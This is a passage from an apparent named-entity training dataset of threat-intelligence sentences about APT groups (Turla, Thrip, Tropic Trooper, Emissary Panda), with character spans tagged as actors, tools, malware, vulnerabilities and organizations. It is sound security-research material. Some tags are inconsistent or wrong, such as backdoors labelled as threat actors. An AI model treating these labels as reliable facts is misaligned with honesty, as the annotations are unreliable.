"dnrti_train"}} {"text": "LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": {"VULNERABILITY: Microsoft Office vulnerability": [[48, 78]], "VULNERABILITY: CVE-2017-11882": [[81, 95]]}, "info": {"id": "dnrti_train_001456", "source": "dnrti_train"}} {"text": "This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" .", "spans": {}, "info": {"id": "dnrti_train_001457", "source": "dnrti_train"}} {"text": "The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"THREAT_ACTOR: LuckyMouse": [[106, 116]], "ORGANIZATION: employees": [[210, 219]]}, "info": {"id": "dnrti_train_001458", "source": "dnrti_train"}} {"text": "According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks .", "spans": {"TOOL: JavaScript code": [[60, 75]]}, "info": {"id": "dnrti_train_001459", "source": "dnrti_train"}} {"text": "the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) .", "spans": {"TOOL: HyperBro": [[51, 59]], "TOOL: Remote Access Trojan": [[64, 84]], "TOOL: RAT": [[87, 90]]}, "info": {"id": "dnrti_train_001460", "source": "dnrti_train"}} {"text": "The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 .", "spans": {"TOOL: MikroTik": [[144, 152]]}, "info": {"id": "dnrti_train_001461", "source": "dnrti_train"}} {"text": "the targets of the hacking group were in the automotive 
.", "spans": {}, "info": {"id": "dnrti_train_001462", "source": "dnrti_train"}} {"text": "Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"ORGANIZATION: Dell SecureWorks": [[0, 16]], "THREAT_ACTOR: Group-3390": [[57, 67]]}, "info": {"id": "dnrti_train_001463", "source": "dnrti_train"}} {"text": "The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"ORGANIZATION: defense contractors": [[62, 81]], "ORGANIZATION: law firms": [[112, 121]], "ORGANIZATION: political organizations": [[128, 151]], "ORGANIZATION: minority ethnic groups": [[197, 219]]}, "info": {"id": "dnrti_train_001464", "source": "dnrti_train"}} {"text": "LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"ORGANIZATION: Dell SecureWorks": [[67, 83]]}, "info": {"id": "dnrti_train_001465", "source": "dnrti_train"}} {"text": "Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack .", "spans": {"THREAT_ACTOR: Threat Group 3390": [[14, 31]], "THREAT_ACTOR: Emissary Panda": [[48, 62]]}, "info": {"id": "dnrti_train_001466", "source": "dnrti_train"}} {"text": "the United Kingdom had data stolen by members of Emissary Panda .", "spans": {"THREAT_ACTOR: Emissary Panda": [[49, 63]]}, "info": {"id": "dnrti_train_001467", "source": "dnrti_train"}} 
{"text": "the US had data stolen by members of Emissary Panda .", "spans": {"THREAT_ACTOR: Emissary Panda": [[37, 51]]}, "info": {"id": "dnrti_train_001468", "source": "dnrti_train"}} {"text": "No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": {"VULNERABILITY: zero-day vulnerabilities": [[3, 27]], "VULNERABILITY: CVE-2011-3544": [[124, 137]], "VULNERABILITY: CVE-2010-0738": [[185, 198]], "ORGANIZATION: Dell SecureWorks'": [[231, 248]]}, "info": {"id": "dnrti_train_001469", "source": "dnrti_train"}} {"text": "The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese .", "spans": {}, "info": {"id": "dnrti_train_001470", "source": "dnrti_train"}} {"text": "If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC .", "spans": {}, "info": {"id": "dnrti_train_001471", "source": "dnrti_train"}} {"text": "Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address .", "spans": {}, "info": {"id": "dnrti_train_001472", "source": "dnrti_train"}} {"text": "There has also been at least one victim targeted by a spear-phishing attack .", "spans": {}, "info": {"id": "dnrti_train_001473", "source": "dnrti_train"}} {"text": "A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups .", "spans": {"TOOL: PlugX tool": [[37, 47]]}, "info": {"id": "dnrti_train_001474", "source": "dnrti_train"}} {"text": "Once inside networks , the group generally targeted Windows network domain controllers and 
Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network .", "spans": {}, "info": {"id": "dnrti_train_001475", "source": "dnrti_train"}} {"text": "They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server .", "spans": {"TOOL: keylogger": [[62, 71]], "TOOL: backdoor malware": [[76, 92]]}, "info": {"id": "dnrti_train_001476", "source": "dnrti_train"}} {"text": "But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface .", "spans": {"TOOL: ASPXTool": [[46, 54]], "TOOL: OwaAuth credential stealing tool": [[189, 221]], "TOOL: Web shell": [[226, 235]]}, "info": {"id": "dnrti_train_001477", "source": "dnrti_train"}} {"text": "By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes .", "spans": {}, "info": {"id": "dnrti_train_001478", "source": "dnrti_train"}} {"text": "TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks .", "spans": {"ORGANIZATION: TAA": [[0, 3]], "ORGANIZATION: Symantec": [[87, 95]]}, "info": {"id": "dnrti_train_001479", "source": "dnrti_train"}} {"text": "January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"ORGANIZATION: TAA": [[15, 18]], "ORGANIZATION: telecoms operator": [[49, 66]]}, "info": {"id": "dnrti_train_001480", "source": "dnrti_train"}} {"text": "Thrip was using PsExec to move laterally between computers on the company 's network .", "spans": {"TOOL: PsExec": [[16, 22]]}, "info": {"id": 
"dnrti_train_001481", "source": "dnrti_train"}} {"text": "TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"ORGANIZATION: TAA": [[0, 3]], "ORGANIZATION: telecoms operator": [[34, 51]]}, "info": {"id": "dnrti_train_001482", "source": "dnrti_train"}} {"text": "AA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"ORGANIZATION: telecoms operator": [[33, 50]]}, "info": {"id": "dnrti_train_001483", "source": "dnrti_train"}} {"text": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land .", "spans": {"TOOL: PsExec": [[0, 6]]}, "info": {"id": "dnrti_train_001484", "source": "dnrti_train"}} {"text": "TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for .", "spans": {"ORGANIZATION: TAA": [[0, 3]], "TOOL: PsExec": [[43, 49]]}, "info": {"id": "dnrti_train_001485", "source": "dnrti_train"}} {"text": "Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": {"MALWARE: Infostealer.Catchamas": [[81, 102]]}, "info": {"id": "dnrti_train_001486", "source": "dnrti_train"}} {"text": "three computers in China being used to launch the Thrip attacks .", "spans": {}, "info": {"id": "dnrti_train_001487", "source": "dnrti_train"}} {"text": "Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator .", "spans": {"ORGANIZATION: satellite communications operator": [[74, 107]]}, "info": {"id": "dnrti_train_001488", "source": "dnrti_train"}} {"text": "Thrip seemed to be mainly interested in the operational side of the company .", "spans": {}, "info": {"id": "dnrti_train_001489", "source": "dnrti_train"}} {"text": "This suggests to us that Thrip 's motives go beyond spying and may also 
include disruption .", "spans": {}, "info": {"id": "dnrti_train_001490", "source": "dnrti_train"}} {"text": "Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations .", "spans": {}, "info": {"id": "dnrti_train_001491", "source": "dnrti_train"}} {"text": "The group had also targeted three different telecoms operators , all based in Southeast Asia .", "spans": {"ORGANIZATION: telecoms operators": [[44, 62]]}, "info": {"id": "dnrti_train_001492", "source": "dnrti_train"}} {"text": "In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": {"ORGANIZATION: telecoms companies": [[93, 111]], "ORGANIZATION: customers": [[137, 146]]}, "info": {"id": "dnrti_train_001493", "source": "dnrti_train"}} {"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": {"MALWARE: Catchamas": [[0, 9]]}, "info": {"id": "dnrti_train_001494", "source": "dnrti_train"}} {"text": "Many of the tools they use now feature new behaviors , including a change in the way they maintain a foothold in the targeted network .", "spans": {}, "info": {"id": "dnrti_train_001495", "source": "dnrti_train"}} {"text": "Execute a command through exploits for CVE-2017-11882 .", "spans": {"VULNERABILITY: CVE-2017-11882": [[39, 53]]}, "info": {"id": "dnrti_train_001496", "source": "dnrti_train"}} {"text": "Execute a command through exploits for CVE-2018-0802 .", "spans": {"VULNERABILITY: CVE-2018-0802": [[39, 52]]}, "info": {"id": "dnrti_train_001497", "source": "dnrti_train"}} {"text": "The backdoor will load the encrypted configuration file and decrypt it , then use 
Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers .", "spans": {"TOOL: Secure Sockets Layer": [[82, 102]], "TOOL: SSL": [[105, 108]], "TOOL: command-and-control": [[134, 153]]}, "info": {"id": "dnrti_train_001498", "source": "dnrti_train"}} {"text": "TClient is actually one of Tropic Trooper 's other backdoors .", "spans": {"TOOL: TClient": [[0, 7]]}, "info": {"id": "dnrti_train_001499", "source": "dnrti_train"}} {"text": "The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": {"MALWARE: sidebar.exe": [[138, 149]], "MALWARE: dllhost.exe": [[161, 172]]}, "info": {"id": "dnrti_train_001500", "source": "dnrti_train"}} {"text": "TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others .", "spans": {"TOOL: TClient": [[0, 7]]}, "info": {"id": "dnrti_train_001501", "source": "dnrti_train"}} {"text": "The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance .", "spans": {}, "info": {"id": "dnrti_train_001502", "source": "dnrti_train"}} {"text": "Taiwan has been a regular target of cyber espionage threat actors for a number of years .", "spans": {}, "info": {"id": "dnrti_train_001503", "source": "dnrti_train"}} {"text": "In early August , Unit 42 identified two attacks using similar techniques .", "spans": {"ORGANIZATION: Unit 42": [[18, 25]]}, "info": {"id": "dnrti_train_001504", "source": "dnrti_train"}} {"text": "which has been active since at least 2011 .", "spans": {}, "info": {"id": "dnrti_train_001505", "source": "dnrti_train"}} {"text": "One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT .", "spans": {"TOOL: Yahoyah malware": [[48, 63]]}, "info": {"id": 
"dnrti_train_001506", "source": "dnrti_train"}} {"text": "This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": {"TOOL: Poison Ivy": [[35, 45]], "ORGANIZATION: Trend Micro": [[110, 121]]}, "info": {"id": "dnrti_train_001507", "source": "dnrti_train"}} {"text": "The document attached to this e-mail exploits CVE-2012-0158 .", "spans": {"VULNERABILITY: e-mail exploits": [[30, 45]], "VULNERABILITY: CVE-2012-0158": [[46, 59]]}, "info": {"id": "dnrti_train_001508", "source": "dnrti_train"}} {"text": "As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": {"MALWARE: decoy files": [[66, 77]]}, "info": {"id": "dnrti_train_001509", "source": "dnrti_train"}} {"text": "Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group .", "spans": {"TOOL: PCShare malware family": [[89, 111]]}, "info": {"id": "dnrti_train_001510", "source": "dnrti_train"}} {"text": "This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[75, 89]], "ORGANIZATION: government institutions": [[107, 130]]}, "info": {"id": "dnrti_train_001511", "source": "dnrti_train"}} {"text": "Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[0, 14]], "VULNERABILITY: CVE-2012-0158": [[40, 53]]}, "info": {"id": "dnrti_train_001512", "source": "dnrti_train"}} {"text": "The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years .", "spans": {"THREAT_ACTOR: Tropic Trooper threat actor 
group": [[4, 37]]}, "info": {"id": "dnrti_train_001513", "source": "dnrti_train"}} {"text": "Turla is a notorious group that has been targeting governments .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_001514", "source": "dnrti_train"}} {"text": "Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_001515", "source": "dnrti_train"}} {"text": "Turla is a notorious group that has been targeting government officials .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "ORGANIZATION: government officials": [[51, 71]]}, "info": {"id": "dnrti_train_001516", "source": "dnrti_train"}} {"text": "Turla is a notorious group that has been targeting diplomats .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "ORGANIZATION: diplomats": [[51, 60]]}, "info": {"id": "dnrti_train_001518", "source": "dnrti_train"}} {"text": "The codename for Turla APT group in this presentation is MAKERSMARK .", "spans": {"THREAT_ACTOR: Turla APT group": [[17, 32]]}, "info": {"id": "dnrti_train_001519", "source": "dnrti_train"}} {"text": "The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced .", "spans": {"ORGANIZATION: Canada 's Communication Security Establishment": [[64, 110]], "ORGANIZATION: CSE": [[113, 116]], "THREAT_ACTOR: Turla operators": [[152, 167]]}, "info": {"id": "dnrti_train_001520", "source": "dnrti_train"}} {"text": "The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usually see in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazer in this case .", "spans": {"THREAT_ACTOR: Turla 's operation": [[99, 117]], "TOOL: Skipper": [[153, 160]]}, "info": {"id": "dnrti_train_001521", "source": "dnrti_train"}}
{"text": "Southeastern Europe as well as countries in the former Soviet Union Republic has recently been the main target .", "spans": {}, "info": {"id": "dnrti_train_001522", "source": "dnrti_train"}} {"text": "Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar .", "spans": {"TOOL: Gazer": [[46, 51]], "TOOL: backdoors": [[75, 84]], "THREAT_ACTOR: Turla": [[97, 102]], "THREAT_ACTOR: Carbon": [[117, 123]], "THREAT_ACTOR: Kazuar": [[128, 134]]}, "info": {"id": "dnrti_train_001523", "source": "dnrti_train"}} {"text": "Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated .", "spans": {"TOOL: Skipper": [[0, 7]], "TOOL: Gazer": [[75, 80]]}, "info": {"id": "dnrti_train_001524", "source": "dnrti_train"}} {"text": "Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions .", "spans": {"THREAT_ACTOR: Turla APT group": [[0, 15]]}, "info": {"id": "dnrti_train_001525", "source": "dnrti_train"}} {"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions .", "spans": {"TOOL: Epic Turla": [[21, 31]], "ORGANIZATION: government institutions": [[110, 133]]}, "info": {"id": "dnrti_train_001526", "source": "dnrti_train"}} {"text": "Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "TOOL: encrypted container": [[18, 37]]}, "info": {"id": "dnrti_train_001527", "source": "dnrti_train"}} {"text": "Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" .", "spans": {"ORGANIZATION: Kaspersky Lab": [[26, 39]], "TOOL: Epic Turla": [[118, 128]]}, "info": {"id": "dnrti_train_001528", "source": "dnrti_train"}} {"text": "We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks .", "spans": {}, "info": {"id": "dnrti_train_001529", "source": "dnrti_train"}} {"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"TOOL: Epic Turla": [[21, 31]], "ORGANIZATION: embassies": [[110, 119]]}, "info": {"id": "dnrti_train_001530", "source": "dnrti_train"}} {"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military .", "spans": {"TOOL: Epic Turla": [[21, 31]]}, "info": {"id": "dnrti_train_001531", "source": "dnrti_train"}} {"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education .", "spans": {"TOOL: Epic Turla": [[21, 31]]}, "info": {"id": "dnrti_train_001532", "source": "dnrti_train"}} {"text": "When G-Data published on Turla/Uroburos back in February , several questions remained unanswered .", "spans": {"ORGANIZATION: G-Data": [[5, 11]], "THREAT_ACTOR: Turla/Uroburos": [[25, 39]]}, "info": {"id": "dnrti_train_001533", "source": "dnrti_train"}} {"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies .", "spans": {"TOOL: Epic Turla": [[21, 31]], "ORGANIZATION: pharmaceutical companies": [[123, 147]]}, "info": {"id": "dnrti_train_001534", "source": "dnrti_train"}} {"text": "The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" .", "spans": {"THREAT_ACTOR: WorldCupSec": [[65, 76]], "THREAT_ACTOR: TadjMakhal": [[83, 93]], 
"THREAT_ACTOR: Wipbot": [[100, 106]], "THREAT_ACTOR: Tavdig": [[114, 120]]}, "info": {"id": "dnrti_train_001535", "source": "dnrti_train"}} {"text": "Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia .", "spans": {"ORGANIZATION: defense sectors": [[115, 130]]}, "info": {"id": "dnrti_train_001536", "source": "dnrti_train"}} {"text": "One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) .", "spans": {"THREAT_ACTOR: Snake": [[57, 62]], "THREAT_ACTOR: Uroburos": [[66, 74]]}, "info": {"id": "dnrti_train_001537", "source": "dnrti_train"}} {"text": "The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims .", "spans": {"TOOL: VPS": [[37, 40]]}, "info": {"id": "dnrti_train_001538", "source": "dnrti_train"}} {"text": "the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": {"VULNERABILITY: CVE-2013-5065": [[43, 56]], "VULNERABILITY: EoP exploit": [[57, 68]]}, "info": {"id": "dnrti_train_001539", "source": "dnrti_train"}} {"text": "Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim .", "spans": {"TOOL: Epic backdoor": [[77, 90]]}, "info": {"id": "dnrti_train_001540", "source": "dnrti_train"}} {"text": "Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla .", "spans": {"TOOL: Epic Turla": [[89, 99]]}, "info": {"id": "dnrti_train_001541", "source": "dnrti_train"}} {"text": "this attack against a Kaspersky Lab user on August 5 , 2014 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[22, 35]]}, "info": {"id": "dnrti_train_001542", "source": "dnrti_train"}} {"text": "VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 .", "spans": 
{"THREAT_ACTOR: VENOMOUS BEAR": [[0, 13]]}, "info": {"id": "dnrti_train_001543", "source": "dnrti_train"}} {"text": "Venomous Bear has deployed malware to targets using several novel methods .", "spans": {"THREAT_ACTOR: Venomous Bear": [[0, 13]]}, "info": {"id": "dnrti_train_001544", "source": "dnrti_train"}} {"text": "For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims .", "spans": {"THREAT_ACTOR: Turla": [[12, 17]], "TOOL: fake Flash installers": [[63, 84]]}, "info": {"id": "dnrti_train_001545", "source": "dnrti_train"}} {"text": "Turla merely uses the Adobe brand to trick users into downloading the malware .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_001546", "source": "dnrti_train"}} {"text": "By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 .", "spans": {"THREAT_ACTOR: Turla": [[53, 58]]}, "info": {"id": "dnrti_train_001547", "source": "dnrti_train"}} {"text": "Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations .", "spans": {}, "info": {"id": "dnrti_train_001548", "source": "dnrti_train"}} {"text": "Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer .", "spans": {"THREAT_ACTOR: Turla-related": [[59, 72]], "TOOL: malware": [[73, 80]], "TOOL: ComRAT": [[89, 95]], "TOOL: Gazer": [[99, 104]]}, "info": {"id": "dnrti_train_001549", "source": "dnrti_train"}} {"text": "Kaspersky Lab documented this behavior in 2014 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]]}, "info": {"id": "dnrti_train_001550", "source": "dnrti_train"}} {"text": "It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors .", "spans": {"TOOL: fake Flash installers": [[44, 65]]}, "info": {"id": "dnrti_train_001551", 
"source": "dnrti_train"}} {"text": "Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack .", "spans": {}, "info": {"id": "dnrti_train_001552", "source": "dnrti_train"}} {"text": "Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito .", "spans": {}, "info": {"id": "dnrti_train_001553", "source": "dnrti_train"}} {"text": "It is not the first time Turla has used generic tools .", "spans": {"THREAT_ACTOR: Turla": [[25, 30]], "TOOL: generic tools": [[40, 53]]}, "info": {"id": "dnrti_train_001554", "source": "dnrti_train"}} {"text": "In the past , we have seen the group using open-source password dumpers such as Mimikatz .", "spans": {"TOOL: open-source password dumpers": [[43, 71]], "TOOL: Mimikatz": [[80, 88]]}, "info": {"id": "dnrti_train_001555", "source": "dnrti_train"}} {"text": "Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor .", "spans": {"TOOL: Metasploit": [[132, 142]]}, "info": {"id": "dnrti_train_001556", "source": "dnrti_train"}} {"text": "Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": {"MALWARE: malicious file": [[56, 70]]}, "info": {"id": "dnrti_train_001557", "source": "dnrti_train"}} {"text": "However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper .", "spans": {"TOOL: Metasploit": [[67, 77]], "TOOL: Skipper": [[157, 164]]}, "info": {"id": "dnrti_train_001558", "source": "dnrti_train"}} {"text": "Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash 
executable with a trojanized version .", "spans": {}, "info": {"id": "dnrti_train_001559", "source": "dnrti_train"}} {"text": "At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign .", "spans": {"THREAT_ACTOR: Turla": [[68, 73]]}, "info": {"id": "dnrti_train_001560", "source": "dnrti_train"}} {"text": "In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months .", "spans": {}, "info": {"id": "dnrti_train_001561", "source": "dnrti_train"}} {"text": "Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors .", "spans": {"ORGANIZATION: education sectors": [[102, 119]]}, "info": {"id": "dnrti_train_001562", "source": "dnrti_train"}} {"text": "Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer .", "spans": {"TOOL: Metasploit shellcode and drops": [[131, 161]]}, "info": {"id": "dnrti_train_001563", "source": "dnrti_train"}} {"text": "The Turla espionage group has been targeting various institutions for many years .", "spans": {}, "info": {"id": "dnrti_train_001564", "source": "dnrti_train"}} {"text": "Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal .", "spans": {"TOOL: Carbon": [[44, 50]]}, "info": {"id": "dnrti_train_001565", "source": "dnrti_train"}} {"text": "The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon .", "spans": {"TOOL: Carbon": [[173, 179]]}, "info": {"id": "dnrti_train_001566", "source": "dnrti_train"}} {"text": "Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 
.", "spans": {"ORGANIZATION: Kaspersky APT Intelligence Reporting subscription": [[0, 49]]}, "info": {"id": "dnrti_train_001567", "source": "dnrti_train"}} {"text": "Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure .", "spans": {"TOOL: WhiteBear": [[31, 40]]}, "info": {"id": "dnrti_train_001568", "source": "dnrti_train"}} {"text": "WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla – the White Atlas framework \" from mid-2016 .", "spans": {"TOOL: WhiteBear": [[0, 9]], "TOOL: Skipper Turla": [[55, 68], [141, 154]], "TOOL: White Atlas": [[161, 172]]}, "info": {"id": "dnrti_train_001569", "source": "dnrti_train"}} {"text": "However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus .", "spans": {"TOOL: WhiteBear": [[81, 90]]}, "info": {"id": "dnrti_train_001570", "source": "dnrti_train"}} {"text": "From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"ORGANIZATION: embassies": [[77, 86]]}, "info": {"id": "dnrti_train_001571", "source": "dnrti_train"}} {"text": "Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 .", "spans": {"ORGANIZATION: defense-related organizations": [[54, 83]]}, "info": {"id": "dnrti_train_001572", "source": "dnrti_train"}} {"text": "All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"TOOL: WhiteBear": [[19, 28]], "ORGANIZATION: embassies": [[53, 62]]}, "info": {"id": "dnrti_train_001573", "source": "dnrti_train"}} {"text": "Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost 
a year .", "spans": {"THREAT_ACTOR: Turla": [[7, 12]], "ORGANIZATION: German Foreign Office staff": [[100, 127]]}, "info": {"id": "dnrti_train_001574", "source": "dnrti_train"}} {"text": "Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims .", "spans": {}, "info": {"id": "dnrti_train_001575", "source": "dnrti_train"}} {"text": "It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe .", "spans": {}, "info": {"id": "dnrti_train_001576", "source": "dnrti_train"}} {"text": "First , Turla steals emails by forwarding all outgoing emails to the attackers .", "spans": {"THREAT_ACTOR: Turla": [[8, 13]]}, "info": {"id": "dnrti_train_001577", "source": "dnrti_train"}} {"text": "We identified several European governments and defense companies compromised with this group .", "spans": {"ORGANIZATION: defense companies": [[47, 64]]}, "info": {"id": "dnrti_train_001578", "source": "dnrti_train"}} {"text": "What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor .", "spans": {"TOOL: PDF documents": [[74, 87]]}, "info": {"id": "dnrti_train_001579", "source": "dnrti_train"}} {"text": "In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines .", "spans": {}, "info": {"id": "dnrti_train_001580", "source": "dnrti_train"}} {"text": "As detailed in the previous section , this malware is able to manipulate and exfiltrate emails .", "spans": {}, "info": {"id": "dnrti_train_001581", "source": "dnrti_train"}} {"text": "To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments .", "spans": {"TOOL: PDF attachments": [[142, 157]]}, "info": {"id": 
